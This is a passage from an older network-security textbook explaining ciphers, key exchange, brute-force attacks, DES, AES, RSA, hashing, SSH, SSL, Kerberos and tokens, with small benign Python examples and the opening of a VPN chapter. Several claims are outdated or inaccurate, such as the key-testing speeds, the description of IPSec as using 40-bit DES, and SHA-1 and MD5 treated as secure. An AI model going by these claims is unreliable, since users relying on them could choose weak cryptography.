The stream cipher is one of the simplest methods of encrypting data. When a stream cipher is employed, each bit of the data is sequentially encrypted using one bit of the key. A classic example of a stream cipher was the Vernam cipher used to encrypt teletype traffic. The crypto key for the Vernam cipher was stored on a loop of paper. As the teletype message was fed through the machine, one bit of the data would be combined with one bit of the key in order to produce the ciphertext. The recipient of the ciphertext would then reverse the process, using an identical loop of paper to decode the original message.

The Vernam cipher used a fixed-length key, which can actually be pretty easy to deduce if you compare the ciphertext from multiple messages. In order to make a stream cipher more difficult to crack, you could use a crypto key that varies in length. This would help to mask any discernible patterns in the resulting ciphertext. In fact, by randomly changing the crypto key used on each bit of data, you can produce ciphertext that is mathematically impossible to crack, because using different random keys would not generate any repeating patterns that could give a cracker the clues required to break the crypto key. The process of continually varying the encryption key is known as a one-time pad.
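A one-time pad is short enough to demonstrate in full. The sketch below XORs each byte of the message with the corresponding byte of a random pad, the software equivalent of the Vernam paper loop; the message text is of course just an example. As long as the pad is truly random, is as long as the message, and is never reused, the ciphertext cannot be cracked.

    import os

    def vernam(data: bytes, pad: bytes) -> bytes:
        # Combine each bit of the data with the matching bit of the key.
        # XOR is its own inverse, so the same function also decrypts.
        return bytes(d ^ p for d, p in zip(data, pad))

    message = b"ATTACK AT DAWN"          # example plaintext
    pad = os.urandom(len(message))       # random key, same length, used once

    ciphertext = vernam(message, pad)
    assert vernam(ciphertext, pad) == message   # recipient reverses with same pad

Reusing the pad is what breaks the guarantee, a mistake revisited later in this chapter in the discussion of Soviet one-time pad traffic.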
\n" }, { "page_number": 193, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 193\n \nFigure 9.6: Block cipher encryption \nWhen you create the second block of ciphertext (CT2), you mathematically combine the crypto key, the first block \nof ciphertext (CT1), and the second block of data (DB2). Because the variables in your algorithm have changed, \nDB1 and DB2 could be identical, but the resulting ciphertext (CT1 and CT2) will contain different values. This \nhelps to insure that the resulting ciphertext is sufficiently scrambled so that it appears completely random. This \nprocess of using resulting ciphertext in order to encrypt additional blocks of data will continue until all the data \nblocks have been processed. \nThere are a number of different variations on how to mathematically combine the crypto key, the initialization \nvector, and previously created ciphertext. All these methods share the same goal, which is to create a seemingly \nrandom character string of ciphertext. \nPublic/Private Crypto Keys \nSo far, all the encryption techniques we have discussed use secret key algorithms. A secret key algorithm relies on \nthe same key to encrypt and to decrypt the ciphertext. This means that the crypto key must remain secret in order \nto insure the confidentiality of the ciphertext. If an attacker learns your secret key, she would be able to unlock all \nencrypted messages. This creates an interesting Catch-22, because you now need a secure method of exchanging \nthe secret key in order to use the secret key to create a secure method of exchanging information! \nIn 1976, Whitfield Diffie and Martin Hellman introduced the concept of public cipher keys in their paper “New \nDirections in Cryptography.” Not only did this paper revolutionize the cryptography industry; the process of \ngenerating public keys is now known as Diffie-Hellman. \nIn layman’s terms, a public key is a crypto key that has been mathematically derived from a private or secret \ncrypto key. Information encrypted with the public key can only be decrypted with the private key; however, \ninformation encrypted with the private key cannot be decrypted with the public key. In other words, the keys are \nnot symmetrical. They are specifically designed so that the public key is used to encrypt data, while the private \nkey is used to decrypt ciphertext. \nThis eliminates the Catch-22 of the symmetrical secret key, because a secure channel is not required in order to \nexchange key information. Public keys can be exchanged over insecure channels while still maintaining the \nsecrecy of the messages they encrypted. If your friend Fred Tuttle wants to send you a private message, all Fred \nhas to do is encrypt it using your public key. The resulting ciphertext can then only be decrypted using your \nprivate key. \nDiffie-Hellman can even be used to provide authentication. This is performed by signing a message with your \nprivate key before encrypting it with the recipient’s public key. Signing is simply a mathematical algorithm that \nprocesses your private key and the contents of the message. This creates a unique digital signature, which is \nappended to the end of the message. Since the contents of the message are used to create the signature, your digital \nsignature will be different on every message you send. \nFor example, let’s say you want to send Fred a private message. First you create a digital signature using your \nprivate key, then you encrypt the message using Fred’s public key. 
Public/Private Crypto Keys

So far, all the encryption techniques we have discussed use secret key algorithms. A secret key algorithm relies on the same key to encrypt and to decrypt the ciphertext. This means that the crypto key must remain secret in order to ensure the confidentiality of the ciphertext. If an attacker learns your secret key, she would be able to unlock all encrypted messages. This creates an interesting Catch-22, because you now need a secure method of exchanging the secret key in order to use the secret key to create a secure method of exchanging information!

In 1976, Whitfield Diffie and Martin Hellman introduced the concept of public cipher keys in their paper "New Directions in Cryptography." Not only did this paper revolutionize the cryptography industry; the process of generating public keys is now known as Diffie-Hellman.

In layman's terms, a public key is a crypto key that has been mathematically derived from a private or secret crypto key. Information encrypted with the public key can only be decrypted with the private key; the public key is of no help in decrypting that ciphertext. In other words, the keys are not symmetrical. They are specifically designed so that the public key is used to encrypt data, while the private key is used to decrypt ciphertext.

This eliminates the Catch-22 of the symmetrical secret key, because a secure channel is not required in order to exchange key information. Public keys can be exchanged over insecure channels while still maintaining the secrecy of the messages they encrypt. If your friend Fred Tuttle wants to send you a private message, all Fred has to do is encrypt it using your public key. The resulting ciphertext can then only be decrypted using your private key.

Public/private key systems can even be used to provide authentication. This is performed by signing a message with your private key before encrypting it with the recipient's public key. Signing is simply a mathematical algorithm that processes your private key and the contents of the message. This creates a unique digital signature, which is appended to the end of the message. Since the contents of the message are used to create the signature, your digital signature will be different on every message you send.

For example, let's say you want to send Fred a private message. First you create a digital signature using your private key, then you encrypt the message using Fred's public key. When Fred receives the message, he first decrypts the ciphertext using his private key and then checks the digital signature using your public key. If the signature matches, Fred knows that the message is authentic and that it has not been altered in transit. If the signature does not match, Fred knows that either the message was not signed by your private key or the ciphertext was altered in transit. In either event, the recipient knows that he should be suspicious of the contents of the message.

Encryption Weaknesses

Encryption weaknesses fall into one of three categories:

• Mishandling or human error
• Deficiencies in the cipher itself
• Brute force attacks

When deciding which encryption method best suits your needs, make sure you are aware of the weaknesses of your choice.

Mishandling or Human Error

While the stupid user syndrome may be an odd topic to bring up when discussing encryption methods, it does play a critical role in ensuring that your data remains secure. Some methods of encryption lend themselves better to poor key management practices than others. When selecting a method of encryption, make sure you have the correct infrastructure required to administer the cipher keys in an appropriate manner.

While a one-time pad may be the most secure cipher to use, you must be able to generate enough unique keys to keep up with your data encryption needs. Even if you will use a regular secret key cipher, you must make sure that you have a secure method of exchanging key information between hosts. It does little good to encrypt your data if you are simply going to transmit your secret key over the same insecure channel.

Simple key management is one of the reasons that public/private cipher keys have become so popular. The ability to exchange key information over the same insecure channel that you wish to use for your data has great appeal. This greatly simplifies management: you can keep your private key locked up and secure while transmitting your public key using any method you choose.

Proper Key Management Is Key

Back in the 1940s, the Soviet Union was using a one-time pad in order to encrypt its most sensitive data. As you saw in the section on stream ciphers, it is mathematically impossible to break encryption using a one-time pad. This, of course, assumes that the user understands the definition of "one-time." Apparently, the Soviet Union did not.

Since cipher keys were in short supply, the Soviet Union began reusing some of its existing one-time pad keys by rotating them through different field offices. The assumption was that as long as the same office did not use the same key more than once, the resulting ciphertext would be sufficiently secure (how many of you can see your pointy-haired boss making a similar management decision?).

Apparently, this assumption was off base: the United States was able to identify the duplicate key patterns and decrypt the actual messages within the ciphertext. For more than five years, the United States was able to track Soviet spying activity within the United States. This continued until information regarding the cracking activity was relayed to a double agent.
Warning: You must make sure that the public keys you use to encrypt data have been received from the legitimate source and not from an attacker who has swapped in a public key of his own. The validity of a public key can easily be authenticated through a phone call or some other means.

Cipher Deficiencies

Determining whether there are any deficiencies in the cipher algorithm of a specific type of encryption is probably the hardest task a non-cryptographer can attempt to perform. There are, however, a few things you can look for to ensure that the encryption is secure:

• The mathematical formula that makes up the encryption algorithm should be public knowledge. Algorithms that rely on secrecy may very well have flaws that can be exploited in order to expedite cracking.
• The encryption algorithm should have undergone open public scrutiny. Anyone should be able to evaluate the algorithm and be free to discuss their findings. This means that analysis of the algorithm cannot be restricted by confidentiality agreements or contingent on the cryptographer's signing a nondisclosure agreement.
• The encryption algorithm should have been publicly available for a reasonable amount of time in order to ensure that a proper analysis has been performed. An encryption algorithm with no known flaws that has only been publicly available for a few months has not stood the test of time. One of the reasons that many people trust DES encryption is that it has been publicly scrutinized for more than two decades.
• Public analysis should have produced no useful weaknesses in the algorithm. This can be a gray area, because nearly all encryption algorithms have some form of minor flaw. As a rule of thumb, the flaws found within an algorithm should not dramatically reduce the amount of time needed to crack a key beyond what could be achieved by trying all possible key combinations.

By following these simple guidelines, you should be able to make an educated estimation about the relative security of an encryption algorithm.

Brute Force Attacks

A brute force attack is simply an attempt to try all possible cipher key combinations in order to find the one that unlocks the ciphertext. This is why this attack is also known as an exhaustive key search. The cracker makes no attempt to actually crack the key, but relies on the ability to try all possible key combinations in a reasonable amount of time. All encryption algorithms are vulnerable to brute force attacks.

There are a couple of key terms in the preceding paragraph. The first is "reasonable." An attacker must feel that launching a brute force attack is worth the time. If an exhaustive key search will produce your VISA platinum card number in a few hours, the attack may be worth the effort. If, however, four weeks of work are required in order to decrypt your father-in-law's chili recipe, a brute force attack may not be worth the attacker's effort.

The other operative word is "vulnerable." While all encryption algorithms are susceptible to a brute force attack, some may take so long to try all possible key combinations that the amount of time spent cannot be considered reasonable. For example, encryption using a one-time pad can be attacked by brute force, but the attacker had better plan on having many of his descendants carry on his work long after he is gone. To date, the earth has not existed long enough for an attacker to be able to break a proper one-time pad encryption scheme using existing computing power.
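The arithmetic behind "reasonable" is worth working once. A sketch, using the illustrative testing rate quoted in the discussion below (a figure taken from the surrounding text, not from any benchmark), shows how the worst-case search time explodes with key length:

    # Worst-case exhaustive key search: an n-bit key has 2**n combinations.
    SECONDS_PER_YEAR = 60 * 60 * 24 * 365

    def worst_case_years(key_bits: int, keys_per_second: float) -> float:
        return 2 ** key_bits / keys_per_second / SECONDS_PER_YEAR

    for bits in (40, 56, 112, 128):
        print(f"{bits:3}-bit key: {worst_case_years(bits, 200):.1e} years "
              f"at 200 keys per second")

Even at vastly higher testing rates the shape of the curve is the same: each additional key bit doubles the search, which is why the key sizes in Table 9.1 below differ so enormously in practical strength.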
So the amount of time required to perform a brute force attack is contingent on two factors: how long it takes to try a specific key and how many possible key combinations there are. The amount of time required to try each key is dependent on the device providing the processing power. A typical desktop computer is capable of testing approximately five keys per second. A device specifically designed to break encryption keys may be able to process 200 keys or more per second. Of course, greater results can be achieved by combining multiple systems.

As for the number of possible key combinations, this is directly proportional to the size of the cipher key. Size does matter in cryptography: the larger the cipher key, the more possible key combinations exist. Table 9.1 shows some common methods of encryption, along with their associated key sizes. Notice that as the size of the key increases, the number of possible key combinations increases exponentially.

Table 9.1: Methods of Encryption and Their Associated Keys

    Encryption                                Bits in Key      Number of Possible Keys
    Netscape (export-grade SSL)               40               1.1 x 10^12
    DES                                       56               7.2 x 10^16
    Triple DES (2 keys)                       112              5.2 x 10^33
    IDEA                                      128              3.4 x 10^38
    RC4 (variable; commonly 128-bit keys)     128              3.4 x 10^38
    Triple DES (3 keys)                       168              3.7 x 10^50
    Blowfish                                  up to 448        up to 7.3 x 10^134
    AES                                       128, 192, 256    3.4 x 10^38 to 1.2 x 10^77

Of course, all this leads to the question: how long does it take to perform an exhaustive key search on a particular encryption algorithm? The answer should scare you. DES encryption (discussed in the DES section of this chapter) has become somewhat of an industry standard. Over the past few years, RSA Laboratories has staged a DES challenge in order to see how long it would take for a person or persons to crack a string of ciphertext and discover the message hidden inside.

In 1997, the challenge was completed in approximately five months. In January 1998, the challenge was completed in 39 days. During the final challenge, in January 1999, the Electronic Frontier Foundation (EFF) was able to complete the challenge in just under 22 hours.

The EFF accomplished this task through a device designed specifically for brute forcing DES encryption. The cost of the device was approximately $250,000, well within the price range of organized crime and big business. Just after the challenge, the EFF published a book entitled Cracking DES (O'Reilly and Associates), which completely documents the design of the device they used. Obviously, this has put a whole new spin on what key lengths are considered secure.

Government Intervention

As you may know, the federal government regulates the export or use of encryption across U.S. borders. These regulations originated back in World War II, when the use of encryption was thought to be limited to spies and terrorists. These regulations still exist today due in part to the efforts of the National Security Agency (NSA). The NSA is responsible for monitoring and decrypting all communication that can be considered of interest to the security of the United States government.
Originally, the regulations controlled the cipher key size that could be exported or used across U.S. borders. The limitation before the year 2000 was a maximum key size of 40 bits, but there were exceptions to this rule. Organizations that wished to use a larger key size had to apply to the Department of Commerce and obtain a license to do so under the International Traffic in Arms Regulations (ITAR). In order to obtain a usage license for keys larger than 40 bits, you typically had to be a financial institution or a U.S.-based company with foreign subsidiaries.

That all changed in January of 2000, when the U.S. changed its export law to allow any commercial retail encryption product to be sold overseas, provided it was first reviewed by the government. Other countries are following the lead of the U.S., and this entire trend is considered to be a by-product of the explosive growth of e-commerce in the past few years. This decision on the part of the United States also points to the threat posed to encryption by ever more powerful computer systems, a cycle that shows no end in sight.

Good Encryption Required

If you are properly verifying your authentication session, why do you even need encryption? Encryption serves two purposes:

• To protect the data from snooping
• To protect the data from being altered

In the section on clear text transmissions earlier in this chapter, you saw how most IP services transmit all information in the clear. This should be sufficient justification for why you need encryption to shield your data from peering eyes.

Encryption can also help to ensure that your data is not altered during transmission. Such tampering is commonly referred to as a man-in-the-middle attack, because it relies on the attacker's ability to disrupt the data transfer. Let's assume you have a Web server configured to accept online catalog orders. Your customer fills out an online form, which is then saved on the Web server in a plain text format. At regular intervals, these files are transferred to another system via FTP or SMTP.

If an attacker can gain access to the Web server's file system, she would be able to modify these text files prior to processing. A malicious attacker could then change quantities or product numbers in order to introduce inaccuracies. The result is a very unhappy client when the wrong order is received. While this example assumes that the attacker has gained access to a file system, it is possible to launch a man-in-the-middle attack while information is in transit on the network, as well. So while your attacker has not stolen anything, she has altered the data and disrupted your business. Had this information been saved using a good encryption algorithm, this attack would have been far more difficult to stage, because the attacker would not know which values within the encrypted file to change. Even if she were a good guesser, the algorithm decrypting the cipher would detect the change in data.

Solutions

There are a number of solutions available for providing authentication and encryption services. Some are products produced by a specific vendor, while others are open standards. Which option is the right one for you depends on your specific requirements. The options listed below are the most popular for providing authentication, encryption, or a combination of the two. Most likely, one of these solutions can fill your needs.
Data Encryption Standard (DES)

DES is the encryption standard used by the United States government for protecting sensitive, but not classified, data. The American National Standards Institute (ANSI) and the Internet Engineering Task Force (IETF) have also incorporated DES into security standards. DES is by far the most popular secret key algorithm in use today.

The original standard of DES uses a 40-bit (for export) or 56-bit key for encrypting data. The latest standard, referred to as Triple DES, encrypts the plain text three times using two or three different 56-bit keys. This produces ciphertext that is scrambled to the equivalent of a 112-bit or 168-bit key, while still maintaining backward compatibility.

DES is designed so that even if someone knows some of the plain text data and the corresponding ciphertext, there is no way to determine the key without trying all possible keys. The strength of DES encryption-based security rests on the size of the key and on the proper protection of the key. While the original DES standard has been broken by brute force attacks lasting only a few days, the new Triple DES standard should remain secure for many years to come.

Advanced Encryption Standard (AES)

Advanced Encryption Standard (AES) is the follow-up to DES. AES is designed to overcome the deficiencies of DES (encryption weakness, key length restrictions, and device-specific application) while providing a framework for future technological advancements. While AES is not set to become a full standard until the summer of 2001, NIST (National Institute of Standards and Technology) announced on October 2, 2000 that the Rijndael algorithm would be at the core of the replacement to DES. Rijndael is a variable-length block cipher, but its implementation in AES will initially use key lengths of 128, 192, and 256 bits.

NIST chose Rijndael because it performed well not just on Pentium-class machines, but also on smart cards. Combined with the ability to use variable-length keys and other encryption features, this convinced NIST that Rijndael was the best of the five finalists submitted for final AES evaluation.
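In practice you rarely code a block cipher yourself; you call a vetted library. The sketch below encrypts a short message with AES in the chained (CBC) mode described earlier in this chapter. It assumes the third-party Python package cryptography is installed (pip install cryptography); the key, IV, and message are generated purely for the example.

    import os
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    key = os.urandom(32)   # 256-bit AES key
    iv = os.urandom(16)    # random initialization vector, one per message

    # Pad the plain text out to a whole number of 128-bit blocks.
    padder = padding.PKCS7(128).padder()
    plaintext = padder.update(b"the number 42 is extremely important") + padder.finalize()

    encryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    ciphertext = encryptor.update(plaintext) + encryptor.finalize()

    # The receiver reverses the process with the same key and IV.
    decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    unpadder = padding.PKCS7(128).unpadder()
    recovered = unpadder.update(decryptor.update(ciphertext) + decryptor.finalize())
    recovered += unpadder.finalize()
    assert b"42" in recovered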
Digital Certificate Servers

As you saw in the section on public and private cipher keys, a private key can be used to create a unique digital signature. This signature can then be verified later with the public key in order to ensure that the signature is authentic. This process provides a very strong method of authenticating a user's identity. A digital certificate server provides a central point of management for multiple public keys. This prevents every user from having to maintain and manage copies of every other user's public cipher key. A Lotus Notes server will act as a digital certificate server, allowing users to sign messages using their private keys; on delivery, the Notes server informs the recipient whether it could verify the digital signature.

Digital certificate servers, also known as certificate authorities (CA), provide verification of digital signatures. For example, if Toby receives a digitally signed message from Lynn but does not have a copy of Lynn's public cipher key, Toby can obtain a copy of Lynn's public key from the CA in order to verify that the message is authentic. Also, let's assume that Toby wishes to respond to Lynn's e-mail but wants to encrypt the message in order to protect it from prying eyes. Toby can again obtain a copy of Lynn's public key from the CA, so that the message can be encrypted using Lynn's public key.

Certificate servers can even be used to provide single sign-on and access control. Certificates can be mapped to access control lists for files stored on a server in order to restrict access. When a user attempts to access a file, the server verifies that the user's certificate has been granted access. This allows a CA to manage nearly all document security for an organization.

Note: Netscape Certificate Server is a good example of a CA that supports file-level access control.

The largest benefit comes from using a CA that supports X.509, an industry standard format for digital certificates. This allows certificates to be verified and information to be encrypted between organizations. If the predominant method of exchanging information between two domains is e-mail, a CA may be far more cost effective than investing in virtual private networking.

IP Security (IPSec)

IP Security (IPSec) is a public/private key encryption framework being spearheaded by Cisco Systems. It is not so much a new specification as a collection of open standards. IPSec uses a Diffie-Hellman exchange in order to perform authentication and establish session keys. IPSec also uses a 40-bit DES algorithm in order to encrypt the data stream. IPSec has been implemented at the session layer, so it does not require direct application support; its use is transparent to the end user.

One of the benefits of IPSec is that it is very convenient to use. Since Cisco has integrated IPSec into its router line of products, IPSec becomes an obvious virtual private network (VPN) solution. While IPSec is becoming quite popular for remote network access from the Internet, the use of a 40-bit DES algorithm makes it most suited for general business use. Organizations that need to transmit sensitive or financial data over insecure channels may be prudent to look for a different encryption technology.

Kerberos

Kerberos is another authentication solution, one designed to provide a single sign-on to a heterogeneous environment. Kerberos allows mutual authentication and encrypted communication between users and services. Unlike security tokens (discussed later in this chapter), Kerberos relies on each user to remember and maintain a unique password.

When a user authenticates to the local operating system, a local agent sends an authentication request to the Kerberos server. The server responds by sending the encrypted credentials for the user attempting to authenticate to the system. The local agent then tries to decrypt the credentials using the user-supplied password. If the correct password has been supplied, the user is validated and given authentication tickets, which allow the user to access other Kerberos-authenticated services. The user is also given a set of cipher keys that can be used to encrypt all data sessions.

Once the user is validated, she is not required to authenticate manually with any Kerberos-aware servers or applications. The tickets issued by the Kerberos server provide the credentials required to access additional network resources. This means that while the user is still required to remember her password, she only needs one password to access all systems on the network to which she has been granted access.
One of the biggest benefits of Kerberos is that it is freely available. The source code can be downloaded and used without cost. There are also many commercial applications, such as IBM's Global Sign-On (GSO) product, which are Kerberos-compatible but sport additional features and improved management. A number of security flaws have been discovered in Kerberos over the years, but most, if not all, have been fixed as of Kerberos V.

Point-to-Point Tunneling Protocol vs. Layer Two Tunneling Protocol

A discussion of encryption techniques would not be complete without at least mentioning PPTP and L2TP. Developed by Microsoft, PPTP uses authentication based on the Point-to-Point Protocol (PPP) and encryption based on a Microsoft algorithm. Microsoft has integrated support for PPTP into both NT Server and Windows 95/98.

Many within the cryptography field refer to PPTP as kindergarten crypto. This is due to the relative ease with which people have broken both the authentication mechanism and the encryption algorithm. There are a number of tools available on the Internet that will capture password information within a PPTP session. This is a bit disappointing, considering that PPTP is less than four years old. With so many tools available that will break PPTP, it is of little use as a protocol for protecting your data.

Note: For additional information on the insecurities of PPTP, check out http://underground.org/

Layer Two Tunneling Protocol (L2TP) was designed by taking the best parts of PPTP and Cisco's L2F (Layer 2 Forwarding). Most commonly used with IPSec, L2TP focuses on creating the tunnel between two points and leaves encryption tasks to IPSec (or whatever encryption algorithm you've chosen). As a result, L2TP has the following advantages over PPTP:

• L2TP can work over any packet-oriented point-to-point network, including Frame Relay, X.25, and ATM.
• L2TP can create multiple tunnels between a single pair of endpoints.
• L2TP can compress its header information.
• L2TP can provide its own tunnel authentication (not necessary when L2TP is used with IPSec).

Remote Access Dial-In User Service (RADIUS)

RADIUS allows multiple remote access devices to share the same authentication database. This provides a central point of management for all remote network access. When a user attempts to connect to a RADIUS client (such as a terminal access server), he is challenged for a logon name and password. The RADIUS client then forwards these credentials to the RADIUS server. If the credentials are valid, the server returns an affirmative reply and the user is granted access to the network. If the credentials do not match, the RADIUS server will reply with a rejection, causing the RADIUS client to drop the user's connection.

RADIUS has been used predominantly for remote modem access to a network. Over the years, it has enjoyed widespread support from such vendors as 3COM, Cisco, and Ascend. RADIUS is also starting to become accepted as a method for authenticating remote users who are attempting to access the local network through a firewall. Support for RADIUS has been added to Check Point's FireWall-1 and Cisco's PIX firewall.
The biggest drawback to using RADIUS for firewall connectivity is that the specification does not include encryption. This means that while RADIUS can perform strong authentication, it has no process for ensuring the integrity of your data once the session is established. If you do use RADIUS authentication on the firewall, you will need an additional solution in order to provide encryption.

RSA Encryption

The RSA encryption algorithm was created by Ron Rivest, Adi Shamir, and Leonard Adleman in 1977. RSA is considered the de facto standard in public/private key encryption: it has found its way into products from Microsoft, Apple, Novell, Sun, and even Lotus. As a public/private key scheme, it is also capable of performing authentication.

The fact that RSA is widely used is important when considering interoperability. You cannot authenticate or decrypt a message if you are using a different algorithm from the algorithm used to create it. Sticking with a product that supports RSA helps to ensure that you are capable of exchanging information with a large base of users. The large installation base also means that RSA has received its share of scrutiny over the years. This is also an important consideration when you are selecting an algorithm to protect your data.

RSA encryption is owned by RSA Laboratories, which in turn is owned by Security Dynamics. The patent for the RSA algorithm was issued in 1983 and will expire in the year 2000. While RSA Labs still holds control of the patent, the company has been quite generous in the number of institutions to which it has made the technology freely available. RSA Labs has even published source code, which is freely available for noncommercial use.

Hashing

Digital signatures typically work by signing the entire message using a private key. This can be cumbersome and time consuming. An alternative is to create a message digest, and then sign (or encrypt) the message digest (sometimes referred to as a hash) with a private key, thus achieving the same effect as signing the entire message.

This all starts with the hashing algorithm, a mathematical process that takes an original file and creates a digital summary known as a message digest. The message digest is then signed (encrypted) by a private key and transmitted. The receiver applies the public key of the signer to the encrypted message digest to verify the identity of the sender. The receiver then processes the original file using the same hashing algorithm as the sender, and compares the resulting message digest with the one received. If they match, the receiver can be assured that the message has not been altered in transit.

SHA-1

Created by NIST (National Institute of Standards and Technology), SHA-1 (Secure Hash Algorithm) is part of the U.S. government's DSS standard, and works with DSA to create digital signatures. Released in 1994 to correct an unpublished flaw in the original SHA, SHA-1 produces a 160-bit message digest. On October 12, 2000, NIST announced three new SHA-based algorithms to work with the new AES (Advanced Encryption Standard) that will replace DES in 2001. SHA-256, SHA-384, and SHA-512 will work with the three different AES key sizes (128, 192, and 256 bits).

MD5

Created by Professor Ron Rivest of MIT in 1991, MD5 is the latest in the MD series of hash algorithms. Explicitly designed to run on 32-bit processors, MD5 produces a 128-bit digest. MD5 is a faster, although less secure, alternative to SHA-1.
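Computing a message digest takes one line with Python's standard hashlib module, and comparing digests is how the receiver detects tampering. The message contents below are invented for the example, and the sketch demonstrates only the integrity check; the signing of the digest with a private key is left out.

    import hashlib

    original = b"Ship 10 units of part 4242 to Fred Tuttle."

    # Sender computes a digest and would then sign it with a private key.
    sent_digest = hashlib.sha1(original).hexdigest()

    # Receiver recomputes the digest over what actually arrived.
    received = b"Ship 99 units of part 4242 to Fred Tuttle."   # altered in transit
    if hashlib.sha1(received).hexdigest() != sent_digest:
        print("message was altered in transit")

    # The same API produces MD5's shorter, faster digest.
    print(len(hashlib.md5(original).digest()) * 8, "bit digest")   # prints 128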
Secure Shell (SSH)

Secure Shell (SSH) is a powerful method of performing client authentication and safeguarding multiple service sessions between two systems. Written by a Finnish student named Tatu Ylönen, SSH has received widespread acceptance within the UNIX world. The protocol has even been ported to Windows and OS/2.

Systems running SSH listen on port 22 for incoming connection requests. When two systems running SSH establish a connection, they validate each other's credentials by performing a digital certificate exchange using RSA. Once the credentials for each system have been validated, Triple DES is used to encrypt all information that is exchanged between the two systems. The two hosts will authenticate each other in the course of the communication session and periodically change encryption keys. This helps to ensure that brute force or playback attacks are not effective.

SSH is an excellent method of securing protocols that are known to be insecure. For example, telnet and FTP sessions exchange all authentication information in the clear. SSH can encapsulate these sessions to ensure that no clear text information is visible.

Secure Sockets Layer (SSL)

Created by Netscape, Secure Sockets Layer (SSL) provides RSA encryption at the session layer of the OSI model. By encrypting at the session layer, SSL has the ability to be service independent. Although SSL works equally well with FTP, HTTP, and even telnet, the main use of SSL is in secure Web commerce. Since RSA is a public/private key scheme, digital certificates are also supported. This allows SSL to authenticate the server and optionally authenticate the client.

Netscape includes SSL in its Web browser and Web server products. Netscape has even provided source code so that SSL can be adapted to other Web server platforms. A Webmaster developing a Web page can flag the page as requiring an SSL connection from all Web browsers. This allows online commerce to be conducted in a relatively secure manner.

The Internet Engineering Task Force (IETF) is considering a standard based on SSL 3.0 known as the Transport Layer Security (TLS) protocol. While the difference between the two will be minimal, TLS will not interoperate with SSL.
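Because SSL sits below the application protocols, wrapping an ordinary socket is all it takes to protect a session. The sketch below uses Python's standard ssl module (which, in modern versions, negotiates TLS, the successor standard just mentioned); the host name is a placeholder for any server that accepts SSL/TLS connections.

    import socket
    import ssl

    HOST = "www.example.com"   # placeholder for any SSL/TLS-enabled Web server

    context = ssl.create_default_context()   # verifies the server's certificate

    with socket.create_connection((HOST, 443)) as raw_sock:
        # Wrapping the socket performs the handshake: the server presents its
        # digital certificate, and a session key is negotiated for encryption.
        with context.wrap_socket(raw_sock, server_hostname=HOST) as tls:
            print(tls.version(), tls.cipher())
            tls.sendall(b"HEAD / HTTP/1.0\r\nHost: " + HOST.encode() + b"\r\n\r\n")
            print(tls.recv(200).decode("ascii", "replace"))

Everything after the handshake, headers included, crosses the wire encrypted, which is exactly the protection the clear text services listed earlier in this chapter lack.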
Security Tokens

Security tokens, also called token cards (or smart cards), are password-generating devices that can be used to access local clients or network services. Physically, a token is a small device with an LCD display that shows the current password and the amount of time left before the password expires. Once the current password expires, a new one is generated. This provides a high level of authentication security, since a compromised password has a very limited life span. Figure 9.7 shows a number of security tokens produced by Security Dynamics Technologies. These tokens are referred to as SecurID cards.

Figure 9.7: SecurID cards from Security Dynamics Technologies

Security tokens do not directly authenticate with an existing operating system or application. An agent is required in order to redirect the logon request to an authentication server. For example, FireWall-1 supports inbound client authentication via SecurID. When a user out on the Internet wishes to access internal services protected by FireWall-1, she uses her SecurID token to authenticate at the firewall. FireWall-1 does not handle this authentication directly; rather, an agent on the firewall forwards the logon request to a SecurID authentication server, known as an ACE/Server. If the credentials are legitimate, validation is returned to the agent via an encrypted session and the user is allowed access to the internal network.

Each security token is identified by a unit ID number. The unit ID number uniquely identifies each security token to the server. The unit ID is also used to modify the algorithm used to generate each password, so multiple tokens will not produce the same sequence of passwords. Since passwords expire at regular intervals (usually 60 seconds), the security token needs to be initially synchronized with the authentication server.

There are a number of benefits to this type of authentication. First, users are no longer required to remember their passwords. They simply read the current password from the security token and use this value for authentication. This removes the need to have users change their passwords at regular intervals, because this is done automatically by the security token. Also, it is far less likely that a user will give out his password to another individual, because the token is a physical device that needs to be referenced during each authentication attempt. Even if a user does read off his password to another user, the consequences are minimized because the password is only valid for a very short period of time.

Security tokens are an excellent means of providing authentication. Their only drawback is that they do not provide any type of session encryption. They rely on the underlying operating system or application to provide this functionality. For example, authentication information could still be read as clear text if an attacker snoops on a telnet session. Still, the limited life span of any given password makes this information difficult to capitalize on.

Simple Key Management for Internet Protocols (SKIP)

Simple Key Management for Internet Protocols (SKIP) is similar to SSL in that it operates at the session level. As with SSL, this gives SKIP the ability to support IP services regardless of whether the services specifically support encryption. This is extremely useful when you have multiple IP services running between two hosts.

What makes SKIP unique is that it requires no prior communication in order to establish or exchange keys on a session-by-session basis. The Diffie-Hellman public/private algorithm is used to generate a shared secret, which is used to provide IP packet-based encryption and authentication.

While SKIP is extremely efficient at encrypting data, which improves VPN performance, it relies on the long-term protection of this shared secret in order to maintain the integrity of each session. SKIP does not continually generate new key values, as SSH does. This makes SKIP encryption vulnerable if the keys are not protected properly.

Summary

In this chapter, you saw why good authentication is important and what kinds of attacks can be launched if you do not use it. You also learned about encryption and the differences between secret and public/private algorithms.
Finally, we looked at a number of authentication and encryption options that are currently available.

Now that you understand encryption, it is time to put it to use by creating a virtual private network (VPN). Extranets have become quite popular, and the ability to create a secure VPN has become a strong business need.

Chapter 10: Virtual Private Networking

Not since the introduction of the Internet has a single technology brought with it so much promise, or so much controversy. Virtual private networking (VPN) has been touted as the cure-all for escalating WAN expenses, and feared for being the Achilles' heel in perimeter security. Obviously, the true classification of VPN technology lies somewhere in the middle.

Interestingly, it has been financial institutions, trading companies, and other organizations at high risk of attack that have spearheaded the deployment of VPN technology, embracing VPNs in order to extend their network perimeters.

VPN Basics

A virtual private network session is an authenticated and encrypted communication channel across some form of public network, such as the Internet. Since the network is considered insecure, encryption and authentication are used to protect the data while it is in transit. Typically, a VPN is service independent, meaning that all information exchanged between the two hosts (Web, FTP, SMTP, and so on) is transmitted along this encrypted channel.

Figure 10.1 illustrates a typical example of a VPN configuration. The figure shows two different networks that are both connected to the Internet. These two networks wish to exchange information, but they want to do so in a secure manner, as some of the data they will be exchanging is private. To safeguard this information, a VPN is set up between the two sites.

VPNs require a bit of advance planning. Before establishing a VPN, the two networks must do the following:

• Each site must set up a VPN-capable device on the network perimeter. This could be a router, a firewall, or a device dedicated to VPN activity.
• Each site must know the IP subnet addresses used by the other site.
• Both sites must agree on a method of authentication and exchange digital certificates if required.
• Both sites must agree on a method of encryption and exchange encryption keys as required.

